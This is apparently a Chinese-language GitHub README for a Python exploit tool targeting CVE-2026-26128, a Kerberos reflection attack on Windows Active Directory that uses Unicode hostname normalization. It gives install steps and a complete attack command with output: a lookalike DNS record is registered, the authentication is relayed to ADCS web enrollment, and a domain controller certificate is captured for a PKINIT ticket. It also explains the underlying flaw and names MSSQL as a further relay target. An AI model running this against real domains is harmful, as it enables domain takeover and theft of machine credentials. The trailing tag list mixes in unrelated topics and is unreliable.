jarnovandenbrink/CVE-2026-26128

# CVE-2026-26128  利用 Windows Active Directory 中通过 Unicode 规范化实现 Kerberos 反射的 Python 工具。基于 [Guillaume André / Synacktiv](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part) 的研究。 ### 安装说明 这些工具仅兼容 Python 3.8 及以上版本。从 GitHub 克隆仓库，安装依赖项后即可使用： ``` git clone https://github.com/jarnovandenbrink/CVE-2026-26128.git cd CVE-2026-26128 pip install -r requirements.txt ``` ### 使用方法 ``` python3 CVE-2026-26128.py contoso.com/john:password -t http://contoso-dc.contoso.com/certsrv/certfnsh.asp -l 192.168.1.80 -dc-ip 192.168.1.10 [*] Connecting to LDAP on 192.168.1.10 [*] LDAP connection established [*] Adding DNS record: cⓞntoso-dc.contoso.com [*] Waiting for DNS propagation... 180s [*] DNS propagation complete [*] Setting up SMB Server [*] SMBD: Received connection from 192.168.1.10 [*] HTTP server returned status code 200, treating as a successful login [*] [+] Attack worked! [*] Certificate will be written to: /path/to/CONTOSO-DC.pfx [*] To request a TGT using PKINIT run: python3 gettgtpkinit.py contoso.com/CONTOSO-DC$ -cert-pfx /path/to/CONTOSO-DC.pfx -dc-ip 192.168.1.10 out.ccache [*] GOT CERTIFICATE! ID 16 [*] Writing PKCS#12 certificate to ./CONTOSO-DC.pfx [*] Certificate successfully written to file ``` 此外，此攻击也可针对 ADCS Web 注册和 MSSQL 执行。请注意，对于到 MSSQL 的 Kerberos 中继，SQL Server 必须作为机器账户运行。否则，AP-REQ 将无法使用正确的密钥进行解密。 ### 漏洞利用 该工具利用了 Windows 在解析 SPN 时规范化 Unicode 字符的方式。`DnsCache` 服务使用带有 `NORM_IGNORECASE` 标志的 `CompareStringW`，该函数会将 `ⓢⓡⓥ1․ⓐⓓ․ⓛⓞⓒⓐⓛ` 与 `srv1.ad.local` 视为不同，从而导致其发出 DNS 请求。另一方面，域控制器则使用带有规范化标志 `0x31403` 的 `LCMapStringEx`。通过为该 Unicode 主机名注册一条指向攻击者机器的 DNS 记录，AP-REQ 就可以被中继到任何未强制执行通道绑定或通信完整性的服务。 目前支持的中继目标为 ADCS Web 注册和 MSSQL。计划未来支持 SCCM AdminService。请注意，在安装了 2026 年 3 月 Patch Tuesday 更新的系统上，SMB 中继已不再可能实现。

标签：ADCS, AD域安全, Checkov, CTF学习, CVE-2026-26128, DNS记录注入, HTTP, Kerberos反射, M2M, PKINIT, PoC, Python, SMB服务器, TGT申请, Unicode规范化, Windows Active Directory, XXE攻击, 内网渗透, 域控提权, 工控安全, 无后门, 暴力破解, 机器账户, 模拟器, 证书服务, 超级时间线, 身份验证绕过, 逆向工具